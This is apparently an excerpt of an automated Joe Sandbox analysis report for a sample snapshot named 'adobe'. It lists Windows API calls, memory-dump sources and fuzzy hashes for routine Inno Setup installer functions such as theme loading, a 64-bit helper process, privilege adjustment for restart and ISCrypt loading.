                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004016E5
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: 461e3ea3c3f350111c30ebcaae036f378a8db35a49b87e0ff078fda23b500ab0
                                                                                                                                                          • Instruction ID: a6e7c4f6b24507bbfa1b5e3bb33a91ffb91a5c0164af84241c7500694563929a
                                                                                                                                                          • Opcode Fuzzy Hash: 461e3ea3c3f350111c30ebcaae036f378a8db35a49b87e0ff078fda23b500ab0
                                                                                                                                                          • Instruction Fuzzy Hash: 3D11C272A057019FC3108F19CC80A2BB7E5EFC4364F09C93DE598673A4D735AC409789
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                          • Opcode ID: f03d6e23e0814ed38ad111c485b9c5f56edcb767316cc9ebf57e90da0b95743e
                                                                                                                                                          • Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
                                                                                                                                                          • Opcode Fuzzy Hash: f03d6e23e0814ed38ad111c485b9c5f56edcb767316cc9ebf57e90da0b95743e
                                                                                                                                                          • Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetLastError.KERNEL32(00000000,0045269D), ref: 0045267F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                          • Opcode ID: ba20ea88db32640572c9e80b2efaab73f3d569c0a3c1dfb5018a64da4f3a5f6e
                                                                                                                                                          • Instruction ID: fbdab6b76a9d3b96366ddb67014f1af99c6df0f6a37962f4a3f47f1f4f19d995
                                                                                                                                                          • Opcode Fuzzy Hash: ba20ea88db32640572c9e80b2efaab73f3d569c0a3c1dfb5018a64da4f3a5f6e
                                                                                                                                                          • Instruction Fuzzy Hash: 03017035604204AF8B00DF699C004FEF7F8DB8A3207608277FC28D3352DB745D199664
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,000030C8,000070CB,00401973), ref: 00401766
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                          • Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                                                                                          • Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
                                                                                                                                                          • Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                                                                                                          • Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                          • Opcode ID: 0ff4ee60063cca5cc388bed8bc269adaedd678e8b63f1737cb83f885b9663226
                                                                                                                                                          • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                                                                                                          • Opcode Fuzzy Hash: 0ff4ee60063cca5cc388bed8bc269adaedd678e8b63f1737cb83f885b9663226
                                                                                                                                                          • Instruction Fuzzy Hash:
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                            • Part of subcall function 0044AE58: GetVersionExA.KERNEL32(00000094), ref: 0044AE75
                                                                                                                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,?,0044EFC9,004972BA), ref: 0044AED3
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0044AEEB
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0044AEFD
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0044AF0F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0044AF21
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF33
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0044AF45
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0044AF57
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0044AF69
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0044AF7B
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0044AF8D
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0044AF9F
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0044AFB1
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0044AFC3
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0044AFD5
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0044AFE7
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0044AFF9
                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0044B00B
• GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0044B01D
• GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0044B02F
• GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0044B041
• GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0044B053
• GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0044B065
• GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0044B077
• GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0044B089
• GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0044B09B
• GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0044B0AD
• GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0044B0BF
• GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0044B0D1
• GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0044B0E3
• GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0044B0F5
• GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0044B107
• GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0044B119
• GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0044B12B
• GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0044B13D
• GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0044B14F
• GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0044B161
• GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0044B173
• GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0044B185
• GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0044B197
• GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0044B1A9
• GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0044B1BB
• GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0044B1CD
• GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0044B1DF
• GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0044B1F1
• GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0044B203
• GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0044B215
• GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0044B227
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: AddressProc$LibraryLoadVersion
• String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
• API String ID: 1968650500-2910565190
• Opcode ID: 3b5ed5aea82f440f1ac1c12c3b524ca588b5889b7cf3765a5a7d5995296d9664
• Instruction ID: a412a743d8d6f7d45af61582fe4c6e78a33dc70606a22357c48ac29c98de50d6
• Opcode Fuzzy Hash: 3b5ed5aea82f440f1ac1c12c3b524ca588b5889b7cf3765a5a7d5995296d9664
• Instruction Fuzzy Hash: 5991C9B0640B50EBEF00EFF598C6A2A36A8EB15B14714457BB444EF295D778C814CF9E
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetTickCount.KERNEL32 ref: 00457E4F
• QueryPerformanceCounter.KERNEL32(02333858,00000000,004580E2,?,?,02333858,00000000,?,004587DE,?,02333858,00000000), ref: 00457E58
• GetSystemTimeAsFileTime.KERNEL32(02333858,02333858), ref: 00457E62
• GetCurrentProcessId.KERNEL32(?,02333858,00000000,004580E2,?,?,02333858,00000000,?,004587DE,?,02333858,00000000), ref: 00457E6B
• CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 00457EE1
• GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,02333858,02333858), ref: 00457EEF
• CreateFileA.KERNEL32(00000000,C0000000,00000000,00498B04,00000003,00000000,00000000,00000000,0045809E), ref: 00457F37
• SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045808D,?,00000000,C0000000,00000000,00498B04,00000003,00000000,00000000,00000000,0045809E), ref: 00457F70
  • Part of subcall function 0042D890: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8A3
• CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458019
• CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045804F
• CloseHandle.KERNEL32(000000FF,00458094,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458087
  • Part of subcall function 00452B0C: GetLastError.KERNEL32(00000000,0045357D,00000005,00000000,004535B2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,00496A6D,00000000), ref: 00452B0F
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
• String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
• API String ID: 770386003-3271284199
• Opcode ID: a1c450d8ffa61f2b1e923d7f39d76a49e90faac0dc805e9488091df0f68956b4
• Instruction ID: b563b2c895ae2dba4144f0cf50b55dbfcef9f20904619bb7072887bec0bf6eb4
• Opcode Fuzzy Hash: a1c450d8ffa61f2b1e923d7f39d76a49e90faac0dc805e9488091df0f68956b4
• Instruction Fuzzy Hash: CA713270A047449EDB10DF69CC46B9EBBF4AB05705F1084BAF908FB282DB785948CF69
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00476F8C: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FA5
  • Part of subcall function 00476F8C: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00476FAB
  • Part of subcall function 00476F8C: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00476FBE
  • Part of subcall function 00476F8C: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,02332BD0,?,?,?,02332BD0), ref: 00476FE8
  • Part of subcall function 00476F8C: CloseHandle.KERNEL32(00000000,?,?,?,02332BD0,00477150,00000000,0047726E,?,?,-00000010,?), ref: 00477006
  • Part of subcall function 00477064: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004770F6,?,?,?,02332BD0,?,00477158,00000000,0047726E,?,?,-00000010,?), ref: 00477094
• ShellExecuteEx.SHELL32(0000003C), ref: 004771A8
• GetLastError.KERNEL32(00000000,0047726E,?,?,-00000010,?), ref: 004771B1
• MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004771FE
• GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00477222
• CloseHandle.KERNEL32(00000000,00477253,00000000,00000000,000000FF,000000FF,00000000,0047724C,?,00000000,0047726E,?,?,-00000010,?), ref: 00477246
Strings
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
• String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
• API String ID: 883996979-221126205
• Opcode ID: bae8e6094ea23e3d6cb718dce3c682f878d0197b9e1d8439d12bf4a56de9586d
• Instruction ID: 875c3796c046624c2228b02c90a975a84e6b5ea672051c8ab2535e6639634d95
• Opcode Fuzzy Hash: bae8e6094ea23e3d6cb718dce3c682f878d0197b9e1d8439d12bf4a56de9586d
• Instruction Fuzzy Hash: EC316570A04608AEDB11EFEAC841ADEB7B8EF05314F9084BBF518E7392D77C59058B59
Uniqueness

Uniqueness Score: -1.00%

APIs
• SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 00422A04
• ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BCE), ref: 00422A14
Memory Dump Source
• Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_adobe.jbxd
Similarity
• API ID: MessageSendShowWindow
• String ID:
• API String ID: 1631623395-0
• Opcode ID: 424a1ab9b82cb33402a0ef7c7baa594af4bf5d75f22f9edbf91f90ee8efcbe0f
• Instruction ID: 39dda2673d0f757005a7c2ebbeab04d2226afc2b16c541db07efabb99d57c27a
• Opcode Fuzzy Hash: 424a1ab9b82cb33402a0ef7c7baa594af4bf5d75f22f9edbf91f90ee8efcbe0f
• Instruction Fuzzy Hash: 8B916171B04214BFD710EFA9DA86F9D77F4AB04314F5500B6F904AB3A2CB78AE409B58
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • IsIconic.USER32(?), ref: 004183A3
                                                                                                                                                          • GetWindowPlacement.USER32(?,0000002C), ref: 004183C0
                                                                                                                                                          • GetWindowRect.USER32(?), ref: 004183DC
                                                                                                                                                          • GetWindowLongA.USER32(?,000000F0), ref: 004183EA
                                                                                                                                                          • GetWindowLongA.USER32(?,000000F8), ref: 004183FF
                                                                                                                                                          • ScreenToClient.USER32(00000000), ref: 00418408
                                                                                                                                                          • ScreenToClient.USER32(00000000,?), ref: 00418413
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                                                                                          • String ID: ,
                                                                                                                                                          • API String ID: 2266315723-3772416878
                                                                                                                                                          • Opcode ID: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                                                                                          • Instruction ID: f1655e9c1aaa1f9d3e17845697c0dfec8ab0781743990dff6cd0a114faef5a7c
                                                                                                                                                          • Opcode Fuzzy Hash: bc370706f242ec70077bf36f1e1d3e6d0ab536e6ab9c2c39735764bf232ebbb5
                                                                                                                                                          • Instruction Fuzzy Hash: D6112B71505201AFDB00EF69C885F9B77E8AF49314F18067EBD58DB286D738D900CBA9
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetCurrentProcess.KERNEL32(00000028), ref: 00454B1F
                                                                                                                                                          • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 00454B25
                                                                                                                                                          • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00454B3E
                                                                                                                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B65
                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00454B6A
                                                                                                                                                          • ExitWindowsEx.USER32(00000002,00000000), ref: 00454B7B
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                                                                                          • String ID: SeShutdownPrivilege
                                                                                                                                                          • API String ID: 107509674-3733053543
                                                                                                                                                          • Opcode ID: 2cfeda02b6a1e99207587e1f6d93d0b2a9553dc635e40ceb655a503d92ac80ca
                                                                                                                                                          • Instruction ID: 71a91aff67a88180f283013a3394e07777ed446edd0ea8bbca610d6ac1ec1ab7
                                                                                                                                                          • Opcode Fuzzy Hash: 2cfeda02b6a1e99207587e1f6d93d0b2a9553dc635e40ceb655a503d92ac80ca
                                                                                                                                                          • Instruction Fuzzy Hash: 76F06270684302B5E610EA758C07F2B219C9B80B5DF50092ABE45EE1C3D7BCE44C4A2A
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045C9B1
                                                                                                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045C9C1
                                                                                                                                                          • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045C9D1
                                                                                                                                                          • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047E1AB,00000000,0047E1D4), ref: 0045C9F6
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000001.00000002.2904107351.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                          • Associated: 00000001.00000002.2904075458.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904207596.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904237491.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904264823.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                          • Associated: 00000001.00000002.2904291769.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_1_2_400000_adobe.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AddressProc$CryptVersion
